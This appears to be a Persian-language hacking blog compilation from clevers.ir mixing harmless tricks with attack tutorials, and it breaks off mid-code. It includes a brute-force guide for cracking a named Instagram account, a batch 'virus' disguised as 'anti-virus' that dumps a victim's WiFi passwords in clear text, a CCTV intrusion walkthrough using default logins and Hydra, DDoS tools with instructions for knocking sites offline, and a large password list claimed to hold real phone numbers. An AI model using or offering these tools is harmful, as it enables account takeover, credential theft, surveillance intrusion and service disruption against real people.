clevers

رای اینکه بدانید سیستم شما مرد است یا زن
کلیک راست کنید
از قسمت New یه فایل نوت پد ایجاد کنید
New Text Document
سپس کد زیر را در آن کپی کنید

CreateObject("SAPI.SpVoice").Speak"I love you"

سپس نوت پد را با فرمت vbs ذخیره کنید
مثلا:

clevers.vbs

سپس دوبار روی آن کلیک کنید
اگه صدای مرد شنیدید سیستم شما مرد در غیر این صورت سیستم شما خانوم خواهد بود

سلام خدمت تمامی کاربران گل سایت clevers.blog.ir

افرادی زیادی به ما پیام دادن چگونه از هک کسب درآمد کنیم؟ راه های کسب درآمد از هک چیه؟ درآمد یک هکر چقدره؟هکرها چجوری پول در میارن؟ و… عشق علاقه توی کار مهمه ولی وقتی یک کاری انجام بدیم نتونیم ازش پول دربیاریم مارو سرد میکنه و نمیتونیم به هدفی که داریم برسیم تو این پست روش هایی که میشه از هک درآمد داشت جمع آوردی کردم چه برای افرادی ایران قصد فعالیت دارن چه برای افرادی که درخارج از کشور میخوان کار بکنن راجب موضوعی اینکه درآمد یک هکر چقدره زیاد پرسیده بودید توی این پست کامل توضیح دادم. پول درآوردن از طریق هک کاری سختی نیست پشتکار تلاش لازم داره. افراد زیادی در ایران از هک پول درمیارن شما هم میتونید یکی از اون افراد باشید.

هکرها چگونه کسب درآمد میکنند؟

هک و امنیت یکی از حوزه های کامپیوتر و IT میباشد که در دنیای امروز بسیار پرطرفدار و همچنین بسیار کاربردی است. هر کسی اگر سیستمی داشته باشد، اگر فایل های باارزشی داشته باشد و به طور کلی اگر نیازمند امنیت باشد با توجه به پیشرفت تکنولوژی و پیشرفت هکرها به یک متخصص امنیتی نیاز خواهد داشت. متخصصان امنیت و هکرها باید آزمون های امنیتی و شبکه و هک را پشت سربگذرانند و مطالعات زیادی داشته باشند تا بتوانند دانش مورد نیاز را کسب کنند و از سیستم های مختلف حفاظت کنند. و همانطور که حدس میزنید این مسیر به صبر و حوصله و تلاش زیادی نیازمند است.
یکی از راه هایی که میتواند شما را در این مسیر با انگیزه نگه دارد و بتوانید مصمم به سمت هدفتان حرکت کنید، درآمدتان از این رشته میباشد. پول این روزها یک نیاز جدی میباشد و میتوان گفت اگر در کاری درآمد نداشته باشید، علاقه تان هرچقدر هم زیاد باشد، روز به روز کمتر میشود تا اینکه آن کار را کاملا رها کنید. البته این نکته را هم باید ذکر کرد که شما برای پول نباید کار کنید، بلکه باید به سمت علاقه خودتان بروید، پول و درآمد خودبه خود میرسند حوزه هک و امنیت یک حوزه نوپا میباشد که در ایران و تقریبا خارج از کشور هنوز در آن جایگاهی که باید باشد نیست اما با این حال میتوانید درآمد قابل توجهی از این حوزه داشته باشید.

اگر اصطلاح مفید دیگری می‌شناسید در بخش نظرات با ما در میان بگذارید تا به این مطلب اضافه شود.

هکر کیست؟

هک به روشی هوشمندانه برای حل مشکلی ویژه گفته می‌شود، و هکر به کسی گفته می‌شود که از این روش‌های هوشمندانه استفاده می‌کند. ولی متاسفانه امروزه هکر به معنای شخصی است که به منظور اخاذی و یا خرابکاری در سیستم‌ها و سایت‌ها شروع به خراب کاری می‌کند.

البته برخی هکرها را به چند دسته تقسیم کرده اند:

هکر کلاه سفید: به هکری گفته می‌شود که به منظور پیدا کردن مشکلات موجود در سرورها و نرم افزارها به آن‌ها نفوذ می‌کند و پس از گزارش مشکل به مسیولین در رفع عیب آن عیب سهیم است. هکرهای کلاه سفید برخی اوقات در مسابقاتی شرکت می‌کنند که شرکت‌های امنیتی برگذار می‌کنند.

مثلا شرکت گوگل و تلگرام برای گزارش باگ به کاربران هدایای نقدی می‌دهند. هکرهای کلاه سفید می‌توانند از این طریق جوایز ده‌ها هزار دلاری و یا حتی چند صد دلاری برنده شوند.

برخی مدیران سایت‌ها و سرور‌ها نیز به گروه‌های هک کلاه سفید مبالغی می‌دهند تا سعی کنند آن سیستم را هک کنند و عیب‌های موجود را گزارش دهند.

هکر کلاه سیاه: به هکری گفته می‌شود که به منظور اخاذی و یا تخریب وارد سیستم‌ها و سایت‌ها می‌شوند. هکر‌های کلاه سیاه در همه جای دنیا تحت تعقیب هستند و اعمال آن ها خلاف قانون تلقی می‌شوند.

هکر کلاه خاکستری: به هکری گفته می‌شود که گاهی اعمال هکر‌های کلاه سیاه و گاهی اعمال هکرهای کلاه سفید را انجام می‌دهد.

هکر کلاه صورتی: به افراد آماتوری گفته می‌شود که برای ی حس کنکجاوی خود دست به اعمالی می‌زنند که یا سایت‌ها را تخریب کنند و یا به اطلاعاتی دست پیدا کنند که حق دسترسی به آن‌ها را ندارند.

امنیت در دنیای مجازی سال گذشته چالش های بسیاری را پشت سر گذاشت. هکرها با حملات گسترده خود شرکت ها و افراد بسیاری را تحت تاثیر قرار دادند و کاری کردند تا دنیای سایبری یکی از سیاه ترین دوران خود را پشت سر گذارد.

هک شدن سونی به خاطر ساخت یک فیلم، لو رفتن تصاویر شخصی هنرپیشه های معروف، حمله به بانک اطلاعاتی بیمارستان ها و شرکت های بیمه، از دسترس خارج کردن شبکه های بازی Xbox و Playstation و . از جمله رویدادهایی بودند که هکر های کلاه سیاه در سال گذشته از خود بر جای گذاشتند.

همانطوری که احتمالا می دانید، هکر ها به سه دسته تقسیم می شوند. هکرهای کلاه سفید، افرادی هستند که به شرکت ها کمک می کنند ضعف های امنیتی خود را شناسایی کنند و از این راه تلاش می کنند به صورت قانونی کسب درآمد کنند. هکرهای کلاه سیاه، اما افرادی خطرناک هستند که به دنبال افشای اطلاعات و نفوذ های غیر قانونی هستند. و در نهایت گروهی به نام هکر های کلاه خاکستری نیز وجود دارند که فلسفه ای ترکیب شده از دو دسته قبلی را دنبال می کنند.

در این مطلب با 14 مورد از ماهرترین هکرهای تاریخ آشنا می شویم که اکثر آن ها در طبقه بندی کلاه سیاه ها قرار می گیرند. در ادامه با ما همراه باشید.

هک اخلاقی علمی است که برای تست نفوذ قانونی در شبکه های سازمانی به منظور کشف آسیب پذیری های آن انجام می شود. هدف از این اقدامات شناسایی هر گونه آسیب پذیری است که زودتر از مهاجمان کشف شده و برطرف می شود.

هکرهای اخلاقی برای انجام این کار از مجموعه های متنوعی از ابزارهای هکینگ و زبان های برنامه نویسی استفاده می کنند. امروز ما 15 زبان برنامه نویسی برتر برای هکرهای اخلاقی را بررسی خواهیم کرد.

شاید تا حالا این سؤال براتون پیش اومده باشه که: چطور برنامه‌های پایتون رو روی سیستمی که روش پایتون نصب نیست اجرا کنیم؟

اگر برنامه پایتون (یعنی فایل py) رو به یک فایل اجرایی (یعنی exe) تبدیل کنیم، می‌تونیم روی هر سیستمی اون رو اجرا کنیم.

در این خواندنی با استفاده از برنامه PyInstaller این کار را انجام میدیم.

 در این خواندنی از پایتون نسخه 3.5 استفاده شده. تبدیل برای برنامه‌هایی که از ماژول turtle استفاده کرده‌اند هم موفق انجام شده. لیست کامل ماژول‌هایی که PyInstaller پشتیبانی میکنه را میتونی اینجا ببینی. برای اطلاعات دقیق‌تر درباره اینکه PyInstaller چطور کار میکنه هم اینجا رو میتونی نگاه کنی.

خیلی‌ از افراد از من می‌پرسن که چطور می‌تونن هکر بشن! من در این قسمت قصد دارم  ۱۲ گام به شما معرفی کنم تا یک هکر قدرتمند بشین. آماده این؟

گام اول : مهارت‌های شبکه

شما باید با یکسری از مفاهیم شبکه که در زیر ذکر شده اند تا حدی آشنا باشین:

• DHCP
• NAT
• Subnetting
• IPv4
• IPv6
• Public v Private IP
• DNS
• Routers and switches
• VLANs
• OSI model
• MAC addressing
• ARP

گام دوم : مهارت‌های لینوکس

در این گام پیشنهاد میگردد که با سیستم عمل لینوکس (کالی، اوبونتو) آشنا بشین. دلیل اصلی‌ این مساله توسعه اکثر نرم‌افزارهای امنیتی در لینوکس می‌باشد.

گام سوم : مهارت آنالیز پروتکل

استفاده از ابزارهایی مانند Wireshark به هکر کمک می‌کند که بتواند داده‌های در حال انتقال در سطح شبکه را مورد وارسی قرار دهد.

گام چهارم : مجازی سازی

یادگیری و استفاده از سیستمهای مجازی سازی مانند Virtual Box سبب میشود که  یک هکر بتواند محیطی مجازی برای تمرین خود فراهم نماید.

گام پنجم : مفاهیم و تکنولوژی‌های مربوط به امنیت

یک هکر باید با اصطلاحات و تکنولوژی هایی که مربوط به امنیت داده میباشد آشنا باشد. به عنوانه مثال، Firewall، VPN، IDS چندین نمونه از تکنولوژی هایی هستند که در زمینه امنیت اطلاعات مورد استفاده قرار میگیرند.

گام ششم: آشنایی با تکنولوژی شبکه‌های وایرلس

به منظر نفوذ به شبکه‌های وایرلس، یه هکر باید سطح دانش خود را در زمینه آشنایی با شبکه‌های وایرلس و همچنین نحوه رمزنگاری آنها مانند WEP، WPA و WPA2۲ را بالا ببرد.

گام هفتم : اسکریپت نویسی

آشنایی با زبانهای برنامه نویسی مانند Python، PHP و همچنین Bash این امکان به هکر میدهد تا در صورت نیاز (نبودن ابزار مناسب)، ابزار مربوط به خود را توسعه و در جهت تست نفوذ مورد استفاده قرار دهد.

گام هشتم : پایگاه داده

آشنایی با پایگاه داده‌های معمول مانند MySQL، MSSQL و Oracle  این توانایی به هکر میده که بتونه تست نفوذ بر روی پایگاه داده به راحتی انجام دهد.

گام نهم :وب اپلیکیشن (وب سایت)

در چند ساله اخیر، وبسایتهای زیادی در سرتاسر دنیا به وجود آمده اند. یک متخصص تست نفوذ باید با نحوه کارکرد یک وب اپلیکیشن و نحوه اتصال اون به پایگاه داده آشنا بوده  تا بتونه تست نفوذ بر روی وب سایت با موفقیت انجام بده.

گام دهم : جرمشناسی دیجیتال

یکی‌ از گامهای تست نفوذ ، پاکسازی ردپاها توسط نفوذگر میباشد. به همین دلیل یک هکر قانونمند میتواند با استفاده از روش‌های جرم شناسی‌ دیجیتال، کلیه رده پاهای خود بر روی سیستم قربانی  از بین ببرد.

گام یازدهم : مهندسی‌ مع

یک هکر میتواند از مهندسی‌ مع در جهت آشنایی با عملکرد بدافزار و همچنین تشخیص آنها استفاده نماید.

گام دوازدهم : خلاقیت

یک هکر همیشه باید از ذهن خود در جهت پیدا کردن راهی‌ برای نفوذ استفاده کند. این بدین منظور است که یک متخصص تست نفوذ سعی‌ بر آن دارد که از مسیری های متفاوت تر نسبت به دیگران، به هدف خود که تست نفوذ می‌باشد برسد.

شاید شما هم دوست دارید دیزاین پایتونتون مثله هکرها و برنامه نویس ها باشه برای تغییر دیزاین کامپایلر پایتون میتونید این ویدیو که توسط یکی از دوستای خوبمون ساخته شده را تماشا کنید و از اون بهره گیری کنید در ضمن شما میتونید هر دیزاینی را که دوست داشتید طراحی و شخصی سازی کنید.

سلامی دوباره خدمت دوستان عزیز سایت clevers.ir اینبار در خدمت شما هستیم با آموزش کرک کردن هش از نوع md5 با زبان برنامه نویسی پایتون. شاید شما هم دیده باشید که وقتی از دیتابیس یک سایت پسورد هایی را استخراج میکنیم هش شده باشن (البته از نوع md5) توی این پست میخوایم نحوه کرک کردن این نوع هش هارا با ابزاری که خودم ساختم را آموزش بدم. ولی اول از همه باید بگم که اصلا هش چی هست؟؟؟ در بهترین تعریف هش یعنی نوعی رمز گذاری یه طرفه هش ها انواع مختلفی دارن که تنها تفاوت اونها توی تعداد کارکترشونه یعنی اگه ما به هش md5 یه متن 1000 صفحه ای بدیم آخرش به ما یه هش 32 رقمی میده و اگه بهش یه حرف هم بدیم بازم بهمون یه هش 32 رقمی میده همونجورکه گفتیم هش یه طرفس یعنی وقتی یه عبارتی را هش کنیم دیگه نمیتونیم اون عبارت را از حالت هش دربیاریم مگر اینکه اونا کرک کنیم یعنی تمام عبارت هایی را که فکر میکنیم ممکنه عبارت قبل از هش باشن را هش میکنیم و هششون را با هش اصلی مقایسه میکنیم تا بفهمیم چه عبارتی هش شده.

• اگه عکسا ها کوچیکن روی اونها کلیک کنید

مواد لازم:

1. یه هش از نوع md5
2. زبان برنامه نویسی پایتون
3. لیست انواع عبارت های مورد نطر به صورت فایل txt
4. کمی صبر و حوصله

 مرحله 1:

کد زیر را مستقیما توی یه فایل از نوع py به اسم hashing.py ذخیره کنید.

import hashlib

hash_ = input("Enter the hash: ")
file_pass = input("Enter the file: ")
print("")
counter = 1


with open(file_pass) as f:
    for i in f:
        line = i.strip()
        code = eval("b'"+line+"'")

        if (hashlib.md5(code)).hexdigest() == hash_:

            print("__hash Cracked: <<",line,">> the hash: (",hashlib.md5(code).hexdigest(),")")
            print("<< Hash Cracked in",counter,"counter >>")
            break

        else:
            print(counter,".test: <<",line,">> the hash: (",hashlib.md5(code).hexdigest(),")")
            counter = counter+1

مرحله 2:

یه لیست عبارت بسازید و دقت کنید توی هر خط فقط یه عبارت وارد کنید. مثلا یه فایل مثل زیربسازید و اونو با فرمت txt ذخیره کنید.(اسم فایل نمیتونه فارسی باشه)

mani
ali
admin
mahan
123456
mani1384
roham
reza1234
admin
hacker
reza73
6969
mani1234
alireza
sina
niloofar
123465854
.

مرحله 3:

طبق آموزش های قبلی cmd را باز کنید و به مسیر فایل برید یا مستقیما کد را کامپایل کنید. دقت کنید که برای راحتی کار فایل عبارت هارا توی مسیر hashing.py کپی کنید و اگرنه باید برای وارد کردن فایل مسیرش را هم بنویسیم. ودر نهایت مثل عکس زیر وارد کدی که نوشتیم بشید.

مرحله 4:

حالا باید هش را وارد کنید و سپس اسم فایل را وارد کنید.بعد اینتر را بزنید و خواهید دید که عبارت ها یکی یکی هش میشوند و با هش اصلی مقایسه میشوند و در صورت شباهت به عنوان عبارت اولیه معرفی میشوند.

موفق باشید.

با سلام حدمت کاربران عزیزو دوست داشتنی سایت clevers.ir در این قسمت میخوایم آموزش کرک اینستاگرام را به شما آموزش بدیم پس با ما همراه باشید.این روش کاملا تضمینیه و صددرصد راست و درسته.

مواد لازم:

1. کمی صبر و حوصله
2. نصب بودن زبان برنامه نویسی پایتون روی سیستم شما (اگه هم میخواید پایتون یاد بگیرید اینجا را کلیک کنید)
3. اتصال به اینترنت
4. یک آیدی برای کرک

• در ضمن اگه تصاویر کوچیکن و واضح نیستن روی اونها کلیک کنید

مرحله اول:

خب برای شروع باید بگم که زبان پایتون حتما باید روی سیستم شما نصب باشه و اگرنه ابزار نصب نمیشه پس شما میتونید از اینجا پایتون را نصب و راه اندازی کنید: python.org پس از نصب پایتون باید ابزار instahack را از آدرس زیر دانلود کنید.

ابزار کرک اینستاگرام

مرحله 2:

بعد از دانلود فایل پوشه instahack-master را استراکت کنید و داخلش بشید. روی فایل pass.txt کلیک کنید و پسورد های مورد نظر خودتونو تغییر بدید (دقت کنید که توی هر خط فقط میتونید یک پسورد وارد کنید)و در نهایت فایل را سیو کنید.

مثل عکس زیر پسورد های مدنظرتونو وارد کنید.

مرحله 3:

برای اجرای این ابزار cmd را بازکنید برای این کار میتونید از کلید های ترکیبی windows+r استفاده کنید(windows همون علامت ویندوز روی کیبورده)

بعد از بازشدن پنجره زیر توی اون کلمه cmd را تایپ کنید و اینتر بزنید سپس یه صفحه سیاه باز میشه که اسم اون صفحه cmd هست.

مرحله 4:

باید توی این مرحله به دایرکتوری فایل (ابزار کرکر) برید برای اینکار میتونید روی فایل کلیک راست کنید و از قسمت properties آدرس فایل را کپی کنید مثل عکس های زیر

و مثل عکس زیر محل فایل را کپی کنید

مرحله 5:

بعد آدرسی که کپی کردید را مثل نمونه کد زیر توی cmd جلوی کلمه cd تایپ کنید

cd C:\Users\Home\Desktop\programing\New folder\instahack-master

ولی یادتون باشه بجای آدرسی که من کپی کردم آدرس خودتونو بنویسید

مثل عکس زیر

مرحله 6:

خب تا اینجا که خوب پیش رفتید حالا که اومدید توی دایرکتوری فایل باید وارد فایل بشید و هممون میدونیم برای وارد شدن به فایل پایتون توی cmd باید از آپشن python استفاده کنیم یعنی دقیقا کد زیر را توی cmd کپی کنید تا ابزار کار بکنه

python hackinsta.py

مثل عکس زیر

مرحله 6:

حالا باید یوسرنیمی را که میخواستیم کرک کنیم را وارد کنیم مثلا من میخوام یوسرنیم manish.b.84 را کرک کنم

مرحله 7:

حالا باید ربات کرک را طوری تنظیم کنیم که به درستی اکانت را کرک کنه سوال اولی که میپرسه اینکه میگه آیا پروکسی میخوای یا نه و چونکه اینستاگرام فیلتر نشده!!! n را وارد میکنیم.

سوال دوم اینکه میگه هر چند ثانیه یه بار میخوای یه پسورد را امتحان کنه که ما هم میگیم هر 0 ثانیه یه بار یعنی پشت سر هم پسورد ها را امتحان کنه که سریع تر کارمون راه بیافته.

مرحله آخر :

بعد از زدن اینتر در مرحله بالا خواهید دید که پسورد ها یکی یکی پشت سرهم چک میشن و اگه پسورد اکانت توی لیست پسورد ها باشه بهتون اطلاع میده. و از شانس خوب من پسورد توی لیستم بودم و اکانت کرک شد

• هرگونه استفاده نادرست در قبال این آموزش بر عهده خود شخص بوده و این سایت هیچ مسئولیتی در قبال استفاده از این ابزار ندارد

موفق باشید

تا درودی دیگر بدرود

تو بعضی از فیلمای هکری کلاس میزارن و یکاری میکنن که یه چیزهایی بصورت تصادفی میاد و میره و . که الکی بگن آره این یارو که نشسته پشت سیستم واقعا هکره و داره یه چیزی رو هک میکنه !!!

قراره توی این پست یه همچین چیزی رو با بچ فایل ها ایجاد کنیم

راستی به این نوع صفحات ، صفحات ماتریکس گفته میشه

بصورت کاملا مستقیم میرم سر اصل مطلب ;)

یه فایل متنی ایجاد کنین و کدهای پایین رو داخلش کپی کنین

@echo off
title Clevers Matrix
setlocal enabledelayedexpansion
for /f "tokens=2 delims=[]" %%a in ('ver') do for /f "tokens=2 delims=. " %%a in ("%%a") do set /a "FullScreen=-((%%a-6)>>31)"

if "%1"=="" (
  for %%a in (FontSize:00080008 FontFamily:00000030 WindowSize:00320050 ScreenColors:0000000a CodePage:000001b5 ScreenBufferSize:00320050 FullScreen:!FullScreen!
  ) do for /f "tokens=1,2 delims=:" %%b in ("%%a") do (
    >nul reg add HKCU\Console\TheMatrix /v %%b /t reg_dword /d 0x%%c /f
  )
  start "TheMatrix" /max "%ComSpec%" /c "%~f0" 1 & exit
) else ( >nul reg delete HKCU\Console\TheMatrix /f )

set "Matrix="
set /a "wid=80,hei=50,iMax=wid*hei, sumOfStream=wid*2/2"
for /l %%i in (1 1 !iMax!) do set "Matrix= !Matrix!"
set "bss=!Matrix: =!"

set "dic=~@#$&*()_+{}|<>?`[]\;',./1234567890"
set "dicLen=35"

for /l %%# in (1 1 !wid!) do set "s%%#=0"
for /l %%* in (0 0 0) do (
  for /l %%# in (1 1 !sumOfStream!) do (
    if !s%%#! leq 1 (
      set /a "h%%#=!random!%%(hei-1)+2,p0%%#=!random!%%(wid*(hei+1-h%%#))+1,l%%#=h%%#+!random!%%hei+1,s%%#=l%%#+h%%#,h%%#+=1,p%%#=p0%%#"
    )
    set /a "s%%#-=1,l%%#-=1,h%%#-=1,old=(l%%#-1)>>31,grow=-h%%#>>31,act=grow|old,old0=-^!l%%#,p%%#=(old0&p0%%#)|(~old0&p%%#)"

    if !act! neq 0 (
      set /a "lL=p%%#-1, lR=iMax-p%%#, r=!random! %% dicLen"
      if !old! neq 0 (set "chr= ") else for %%r in (!r!) do set "chr=!dic:~%%r,1!"
      for /f "tokens=1-3" %%a in ("!lL! !p%%#! !lR!") do (set "Matrix=!Matrix:~0,%%a!!chr!!Matrix:~%%b,%%c!")
      set /a "p%%#+=wid"
    )
  )
  cls & <nul set /p "=!Matrix:~0,-1!!bss!"
)

حالا کدهای بالارو با فرمت یا همون پسوند bat ذخیره کنین تو مسیر دل به خواهی

بعدا وارد جایی که فایل رو ذخیره کردین بشین

و زمانی که روی اون دوبار کلیک کنین صفحه ماتریکس ما به نمایش در میاد

اینم تصویری از محیط ماتریکسمون !!!

"اگه تصویر واضح نیست روی اون کلیک کنین"

موفق باشید

شاید شما هم در فیلم های سینمایی دیده باشید که هکر با متصل کردن یک فلش به کامپیوتر کامپیوتر را هک میکند(البته با کلیک کردن روی یک فایل)برای ساخت چنین ویروسی با ما همراه باشید.

• ابتدا یک فایل نوت پد باز کنید
• برای گول زدن شخص مورد نظر میتونید اسم فایل را anti-virus یا هر چیز دیگه ای بزارید
• کد زیر را در اون ذخیره کنید

color 0a
title anti-virus
netsh wlan show profiles > wlans.txt
netsh wlan show profiles * KEY=CLEAR > key-wlans.txt
ipconfig > ipconfig.txt
arp -a > arp.txt
netstat -an > netstat.txt
driverquery > driver.txt
accos > assoc.txt

• فایل را با فرمت cmd ذخیره کنید

و سپس فایل را روی فلشتون کپی کنید(نمیتونید از اسم فارسی استفاده کنید)و فلش را به یک سیستم متصل کنید بعد روی فایل دوبار کلیک کنید سپس username های wifi روی فایل wlans.txt و رمز های wifi روی key-wlans.txt جلوی کلمه contant ذخیره میشوند و اطلاعات مربوط به آی پی ها و پورت ها و درایور ها روی فایل های دیگر ذخیره میشوند.

ایده های خود را با ما در میان بگذارید.

سلام خدمت تمامی کاربران محترم وبسایت باهوش ها.

یکی از جذابترین قسمت فیلم های هکری بخشی بود که دوربین های مداربسته هک میکردن تو اکثر فیلم ها هکر ها به سیستم های نظارتی حفاظتی نفوذ میکنن امنیت این بخش ها بسیار مهم هستش چون بعداز هک شدن دوربین مداربسته هکر تمام محیط مجموعه شمارو زیر نظر داره به راحتی میتونه نقشه های خودش اجرا کنه. امنیت دوربین های مداربسته جدی بگیرید حتی اشخاصی که یک فروشگاه کوچیک دارن.حتما تو یک بخش راجب امنیت دوربین های مدار بسته صحبت میکینم تو ای بخش آموزش تست نفوذ دوربین مدار بسته برای شما آماده کردیم امیدوارم لذت ببرید

امروزه از دوربین های مداربسته بسیار استفاده میشود به طوری در اکثر محیط هایی که ما پا میزاریم شاهد وجود دوربین های مداربسته هستیم , استفاده از دوربین های مداربسته باعث افزایش امنیت مکانی میشود که ما در اونجا حضور داریم , دوربین های مداربسته امنیت ما رو بالاتر میبرن اما اگر دوربین های ما هک شوند امنیت ما از بین میرود (از اونجایی که اکثر افراد فقط از دوربین مداربسته برای حفظ امنیت استفاده میکنن پس هک شدنش امنیت اون مکان رو از بین میبرد) حالا شاید از خودتون بپرسید هکر ها چطوری دوربین های مداربسته رو هک میکنن؟ اگر میخواهید به جواب این سوال برسید پس با ما همراه باشید.

آموزش تست نفوذ دوربین های مدار بسته:

در این آموزش ما با کمک برنامه Angry IP Scanner یک رنج ای پی رو اسکن میکنیم (اگر ای پی دوربین رو دارید نیازی به این کار نیست ما اینجا با اسکن کردن یک رنج ای پی میخواهیم تارگت به دست بیاریم) و بعد از اون با یوزر پسورد پیش فرض (که اکثر یوزر پسورد پیش فرض رو تغییر نمیدن) وارد پنل مدیریت دوربین میشویم البته ما میتونیم عملیات بروت فورس رو هم انجام بدیم تا پسورد رو به دست بیاریم.

در قدم اول ما برنامه Angry Ip Scanner رو دانلود میکنیم و اجرا میکنیم (از این لینک میتونید دانلود کنید)

برروی منو Tools کلیک کنید و گزینه Perferences رو بزنید

آموزش هک دوربین مدار بسته

در قسمت port برید و پورت ۸۰ رو وارد کنید (در این عکس پورت ۸۸ وارد شده ولی شما میتونید پورت های مختلفی رو بررسی کنید)

خب من الان باید یک رنج ای پی به نرم افزار بدم تا شروع کنه به اسکن

بعد از دادن رنج ای پی من گزینه Start رو میزنم و نرم افزار شروع به اسکن میکنه و بعد از اتمام اسکن اون ای پی هایی که کنارشون دایره های سبز رنگ هست یعنی هم قابل دسترس هستن و هم پورتی که من وارد کردم روی این ای پی بازه

من ای پی هایی که فعال هستن و با رنگ سبز مشخص شدن رو در مرورگر وارد میکنم و میبینید که صفحه مدیریت دوربین رو برای من میاره (اینو هم اضافه کنم شما وقتی یک رنج رو اسکن میکنید قرار نیست حتما به ای پی دوربین های مداربسته برسید)

در این بخش شما میتونید دو کار انجام بدید یا یوزر پسورد پیش فرض وارد کنید که یوزر پسورد پیش فرض دوربین های مختلف در سطح اینترنت موجود است یا اینکه صفحه لاگین رو بروت فورس کنید که با ابزاری مثل Hydra میتونید اینکار رو انجام بدید

من با یوزر پسورد پیش فرض اون دوربین تونستم وارد دوربین بشم و میبینید که کنترل کامل روی این دوربین دارم

هک دوربین مدار بسته با کامپیوتر مبحث جذابی برای هکرها هستش درآبنده راجب روش های نفوذ و امنیت دوربین های مدار بسته بیشتر صحبت میکنیم

قول اینو میدم آموزش هک دوربین های مدار بسته در کالی لینوکس خدمت شما ارائه بدیم

امیدوارم که از این آموزش هم لذت کافی رو برده باشید…

سلام و درود خدمت همه کاربران سایت clevers.ir

طی درخواست های مکرر شما یه پسورد لیست خیلی بزرگ جمع آوری کردیم و ساختیم که تمامی موارد زیر توی اون وجود داره:

• اسم های فارسی
• اسم های انگلیسی
• تمامی شماره تلفن های ایران با پیش شماره 0937 و 0938 و 0939 و .
• دو لیست ترکیبی بزرگ از پسورد های متفرقه(نام تیم فوتبال,نام گل,نام های معروف,اسامی هکری و .)
• انواع پسورد های مخصوص اینستاگرام
• انواع پسورد های مخصوص vps
• تمامی تاریخ تولد های میلادی از 1990
• تمامی تاریخ تولد های شمسی از 1320
• یک لیست با نام important-list که تمامی موارد بالا را همراه با 4 میلیون پسورد دیگر شامل میشود (در کل 10 میلیون پسورد)

چون که حجم همه این فایل ها 500 مگابایت میشد اون هارا توی یه فایل RAR خیلی خیلی خیلی فشرده جاسازی کردم که تبدیل شدن به 22 مگابایت پس وقتی که دانلود کردید و استراکت کردید جا نخورید.

در ضمن شماره تلفن ها ساختگی نیست و تمامی شماره ها واقعی هستند حتی میتونید از اونا برای تبلیغات استفاده کنید فقط خواهشا مزاحمت ایجاد نکنید واگر نه برخورد جدی میشه

اگه پسورد لیستی ساختید که متفاوت و بزرگه اطلاع بدید تا با اسم خودتون ثبتش کنم.

اگه نظری داشتید حتما اعلام کنید.

لینک دانلود:

دریافت
حجم: 22.1 مگابایت
توضیحات: بعد از دانلود و استخراج حجمش میشه 500 مگابایت
 

رمز فایل: clevers.ir

در فایل زیر بهترین لیست از پورت های هک و امنیت آمده است

لیستی شامل تمامی حفره های امنیتی و .

این لیست شامل توضیحات کامل و دقیق بوده و برای هر پورت 4 تا 5 توضیح نوشته شده است بعضی از پورت ها در لیست زیر آمده است برای دانلود کامل پورت ها از فایل زیر کمک بگیرید.

port 2 - Death

port 21 - Back Construction, Blade Runner,
          Doly Trojan, Fore, FTP trojan, 
          Invisible FTP, Larva, MBT, Motiv,
          Net Administrator, Senna Spy FTP Server,
          WebEx, WinCrash
port 23 - Tiny Telnet Server, Truva Atl

port 25 - Aji, Antigen, Email Password Sender, 
          Gip, Happy 99, I Love You, Kuang 2, 
          Magic Horse, Moscow Email Trojan, Naebi,
          NewApt, ProMail trojan, Shtrilitz, Stealth, 
          Tapiras, Terminator, WinPC, WinSpy
port 31 - Agent 31, Hackers Paradise, Masters Paradise

port 41 - DeepThroat

port 48 - DRAT

port 50 - DRAT

port 59 - DMSetup

port 79 - Firehotcker

port 80 - Back End, Executor, Hooker, RingZero


.

.

فایل کامل:

دریافت
حجم: 3.2 کیلوبایت
 

رمز فایل: clevers.ir

حمله دیداس یا حمله قطع کردن از سرور حمله ایست که با اون به آی پی قربانی حجم زیادی دیتا ارسال میکنیم و اتصال اونو از سرور قطع میکنیم با ابزار زیر به راحتی میشه اونکار را انجام داد فقط توجه داشته باشید که بسته به سرعت اینترنت خودتون سایز packet را انتخاب کنید و گرنه ابزار از کار میافته.

توجه داشته باشین که به این پست برنامه های بیشتری اضافه میشه و تکمیل میشه

طبق عکس زیر باید در قسمت ip آی پی یا سایت قربانی را وارد کنیم و در قسمت size packet هم اندازه دیتای ارسالی را.

و سپس 10 تا 15 بار روی گزینه attack کلیک کنیدتا به همون مقدار پنجره دیداس باز بشه بعدشم به اندازه مقاوت سایت حمله را ادامه بدید تا وقتی که اسم سایت را سرچ کردید سایت بالا نیاد.

• دقت کنید که به بعضی از سایت های امن نمیتونید اتک بزنید(پس نرید روی گوگل و یوتیوب امتحان کنید)
• در ضمن مطمئن باشید به سایت ما هم نمیتونید حمله کنید

لینک دانلود:

دریافت
حجم: 11.3 کیلوبایت

ابزار 2:

طرز استفاده از این برنامه به این صورته که ابتدا آی پی سایت مورد نظرمون رو بدست میاریم

برای بدست آوردن آی پی سایت ها از دستور زیر در cmd استفاده میکنیم

ping clevers.ir

بعد بر روی Flood کلیک کنید.
دکمه Durdur برای متوقف کردن حمله میباشد
و دکمه Temizle هم برای شروع مجدد است.
مشکلی بود کامنت بزارین!!!

دریافت
حجم: 121 کیلوبایت
 

سلام امیدوارم همگی خوب و خوش و خرم و سر حال و هرچی خوبی باشه باشین :)

اگه دقت کرده باشین بعضی از پست هامون زیرش کلی سوال و جواب و حرفای نامربوط به موضوع پست زده شده
خوب دوستان حرف دارن میخوان بگن نمیشه جلوشو گرفت
این پست رو ایجاد میکنم تا سوالای جدیدمون رو اینجا مطرح کنیم
اگه عمری باشه برای سوال تون پست جدید مینویسم و اگه مُردم هم میگم دوستان خوبم در مدیریت براتون بنویسن :)
این پست رو پین میکنم تا همیشه در دسترس باشه

سوالات خصوصی در هیج جای این وب پاسخ داده نمیشه 

سلام خدمت کاربران گل clevers.ir

به در خواست یکی از دوستان عزیز یک کتاب مقدماتی برای شروع هک و امنیت برای شما آماده کردیم

این کتاب واقعا عالیییییییییییه

آموزش نفوذ به کلاینت و سرور و.

و آشنایی با الفبای هک و امنیت توش وجود داره

امیدوارم از این کتاب لذت ببرید

دانلود:

دریافت
حجم: 630 کیلوبایت
 

رمز فایل: clevers.ir

سلامی دوباه خدمت کاربران گل clevers.ir

در این قسمت از آموزش میخوایم با هم یه ژنراتور بسازیم با پایتون که برای ما رمزی سخت با تعداد کاراکتری که دوست داشته باشیم را بسازه.

زیاد صحبت نمیکنم و مستقیم میرم سراغ کدها

• در ضمن میتونید توی کد نوع کاراکتر ها را عوض کنید

کد زیر را توی یه فایل با فرمت py ذخیره کنید:

#clevers.ir
import random

